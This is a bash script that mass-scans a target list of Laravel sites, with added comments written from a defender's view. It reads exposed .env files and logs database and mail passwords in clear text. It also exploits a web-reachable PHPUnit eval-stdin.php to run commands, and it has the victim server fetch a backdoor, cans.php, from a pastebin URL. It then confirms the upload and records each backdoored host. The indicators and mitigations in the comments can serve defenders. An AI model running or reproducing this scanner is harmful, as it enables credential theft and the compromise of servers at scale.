- #!/bin/bash
# Bulk prober for two Laravel deployment weaknesses: a web-readable .env file
# (see env()) and a web-reachable PHPUnit eval-stdin.php under /vendor (see
# rce()). Each entry of a target list is checked in a background job; hits are
# appended to laravel-env-log.txt and laravel-rce-log.txt in the working dir.
#
# Indicators a defender can take from this file: GET /.env, POST to
# /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, the marker "Cans21",
# and a dropped file named cans.php in that same PHPUnit directory.
- # CEPOTZ MMPPPSSSHHH AHHHH KNTL
# ANSI colour/style escape sequences; they are interpreted by the `echo -e`
# calls further down and only affect console output.
- RD="\e[91m"
- GR="\e[92m"
- YL="\e[93m"
- WH="\e[97m"
- BL="\e[94m"
- CY="\e[96m"
- B="\e[1m"
- NC="\e[0m"
# rce HOST
# Checks whether HOST exposes PHPUnit's eval-stdin.php to the web and whether
# PHP posted to it is executed; on success it also checks for a dropped file.
# Arguments: $1 - host part of a list entry (passed in by exploit())
# Globals written (nothing is declared local): pathz, exploit, uname, rc, un, shell
# Side effect: appends the dropped file's URL to laravel-rce-log.txt
#
# Defender view of this function:
#   - request: POST .../vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
#     whose body starts with "<?php"
#   - on a vulnerable host the web server itself makes an outbound HTTPS
#     request to pastebin.com and writes cans.php into the PHPUnit directory
#   - follow-up request: GET .../src/Util/PHP/cans.php
#   - mitigation: serve only Laravel's public/ directory, keep vendor/ out of
#     the document root, install without dev dependencies in production, and
#     treat any host where cans.php exists as compromised.
- rce(){
- # payload='uname -a;curl -skL https://pastebin.com/raw/f4xQX4sL -o cans.php'
- pathz='/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
# -s silent, -k skip TLS certificate checks, -L follow redirects. The response
# is expected to wrap the command output between "Cans21 :" and ":".
- exploit=$(curl -skL --data '<?php echo "Cans21 :".system("uname -a;curl -skL https://pastebin.com/raw/f4xQX4sL -o cans.php").":";?>' "$1/$pathz")
# Lookbehind extracts the text after the marker up to the next colon; an empty
# result means the marker never came back, i.e. the PHP was not executed.
- uname=$(echo $exploit | grep -Po "(?<=Cans21 :)[^:]*")
- if [[ ! -z $uname ]]; then
- rc="${GR}RCE${NC}"
# un and shell are assigned here but are not part of the status line that
# exploit() prints.
- un="${GR}[*] Kernel : $uname${NC}${NC}"
# grep -ic counts lines containing the marker (case-insensitive); the drop is
# treated as successful only when exactly one such line is served back.
- if [[ $(curl -s $1/vendor/phpunit/phpunit/src/Util/PHP/cans.php | grep -ic "Cans21") -eq 1 ]]; then
- shell="${GR}[*] Successfully Uploaded : ${CY}$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php${NC}"
- echo "$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php" >> laravel-rce-log.txt
- else
- shell="${RD}[-] Failed Uploading Backdoor${NC}"
- fi
- else
- rc="${RD}RCE${NC}"
- fi
- }
# env HOST
# Requests HOST/.env and extracts database and mail settings from the reply.
# NOTE(review): the function name shadows the external `env` command for the
# rest of the script.
# Arguments: $1 - host part of a list entry (passed in by exploit())
# Globals written (nothing is declared local): exploit, db_host, db, db_u,
#   db_p, m_host, m_port, m_u, m_p, en, dbs, sm, smtp
# Side effect: appends the extracted values in clear text to laravel-env-log.txt
#
# Defender view of this function:
#   - request: GET /.env (TLS errors ignored, redirects followed)
#   - a response containing DB_HOST= means the whole file is readable, so
#     every secret in it needs rotating, not only the eight keys read here
#   - mitigation: point the document root at public/ and deny dotfile
#     requests at the web server.
- env(){
- exploit=$(curl -skL "$1/.env")
# $exploit is expanded unquoted, so line breaks in the file collapse to single
# spaces; that is why each pattern stops at the next space ([^ ]*).
- db_host=$(echo $exploit | grep -Po '(?<=DB_HOST=)[^ ]*')
- db=$(echo $exploit | grep -Po '(?<=DB_DATABASE=)[^ ]*')
- db_u=$(echo $exploit | grep -Po '(?<=DB_USERNAME=)[^ ]*')
- db_p=$(echo $exploit | grep -Po '(?<=DB_PASSWORD=)[^ ]*')
- m_host=$(echo $exploit | grep -Po '(?<=MAIL_HOST=)[^ ]*')
- m_port=$(echo $exploit | grep -Po '(?<=MAIL_PORT=)[^ ]*')
- m_u=$(echo $exploit | grep -Po '(?<=MAIL_USERNAME=)[^ ]*')
- m_p=$(echo $exploit | grep -Po '(?<=MAIL_PASSWORD=)[^ ]*')
# An empty DB_HOST is treated as "no .env exposed"; the mail settings are only
# examined inside the branch where DB_HOST was found.
- if [[ -z $db_host ]]; then
- en="${RD}DB${NC}"
- else
- en="${GR}DB${NC}"
- dbs="${GR}\n [*] DB_HOST : $db_host\n [*] DB_DATABASE : $db\n [*] DB_USERNAME : $db_u\n [*] DB_PASSWORD : $db_p\n${NC}"
- echo "$1 | DATABASE : $db_host | $db | $db_u | $db_p" >> laravel-env-log.txt
# Mail hosts that are empty, "null", localhost or mailtrap are skipped;
# presumably these are regarded as placeholder or sandbox values.
- if [[ -z $m_host || $m_host == "null" || $m_host == "localhost" || $m_host == "mailtrap.io" || $m_host == "smtp.mailtrap.io" ]]; then
- sm="${RD}SMTP${NC}"
- else
- sm="${GR}SMTP${NC}"
- smtp="${GR}\n [*] MAIL_HOST : $m_host\n [*] MAIL_PORT : $m_port\n [*] MAIL_USERNAME : $m_u\n [*] MAIL_PASSWORD : $m_p\n${NC}"
- echo "$1 | SMTP : $m_host | $m_port | $m_u | $m_p" >> laravel-env-log.txt
- fi
- fi
- }
# exploit ENTRY INDEX
# Runs both probes for one list entry and prints a single status line.
# Arguments: $1 - list entry; $2 - counter shown as [$2/$tot]
# Globals read: w and tot (set by the main loop), en, sm, rc, dbs, smtp, loc
# Globals written: u
- exploit(){
# Field 3 of a "/"-split string is the host of "scheme://host/path".
# NOTE(review): assumes list entries are full URLs — confirm; the scheme is
# dropped, so both probes are sent to the bare host name.
- u=$(echo $1 | awk -F/ '{print $3}')
# rce runs only when env returns 0; env's status is that of its last command.
- env $u && rce $u
# loc is not assigned anywhere in the visible script, so it expands to empty.
- echo -e "[$w][$2/$tot] $1 [$en][$sm][$rc]$dbs$smtp$loc"
- }
# Interactive driver: asks for a target list file and pacing values, then
# starts one background exploit() job per list entry and waits for all of them.
# Seen from a target's logs, one source sends a GET /.env followed by a POST to
# eval-stdin.php; seen from the network, the source contacts many hosts in
# bursts separated by a short pause.
- read -p "[?] List Target : " list
- if [[ ! -f $list ]]; then
- echo "[-] File $list Not Exist!"
- exit 1
- fi
- read -p "[?] Threads (Default 10): " thread
# NOTE(review): $thread="" is a single non-empty word, so this test is always
# true and thread ends up 10 whatever was typed. The delay test below has the
# same form, so sleep ends up 1.
- if [[ $thread="" ]]; then
- thread=10;
- fi
- read -p "[?] Delay (Default 1): " sleep
- if [[ $sleep="" ]]; then
- sleep=1;
- fi
- echo
# wc -l with a file argument prints the line count followed by the file name.
- echo -e "[!] ${GR}Target Loaded : ${CY}$(wc -l $list)${NC}"
- echo -e "[!] ${GR}Thread : ${CY}$thread${NC}"
- echo -e "[!] ${GR}Delay : ${CY}$sleep sec${NC}"
- echo -e "[+] ${GR}Start Exploit.......${NC}\n"
- hitung=1
# Loads the list into the array `target`, splitting on CR/LF only;
# GLOBIGNORE='*' keeps entries containing glob characters from being expanded.
- IFS=$'\r\n' GLOBIGNORE='*' command eval 'target=($(cat $list))'
- for (( i = 0; i <"${#target[@]}"; i++ )); do
- targeto="${target[$i]}"
# Pauses $sleep seconds on every $thread-th iteration. Inside [[ ]] the `>` is
# a string comparison, not a numeric one.
- ff=$(expr $hitung % $thread)
- if [[ $ff == 0 && $hitung > 0 ]]; then
- sleep $sleep
- fi
# Timestamp and total are recomputed per entry and read by exploit() as globals.
- w=$(date '+%H:%M:%S')
- tot=$(cat $list | wc -l)
# Each entry is probed in its own background job; jobs are reaped only by the
# final wait.
- exploit $targeto $hitung &
- hitung=$[$hitung+1]
- done
- wait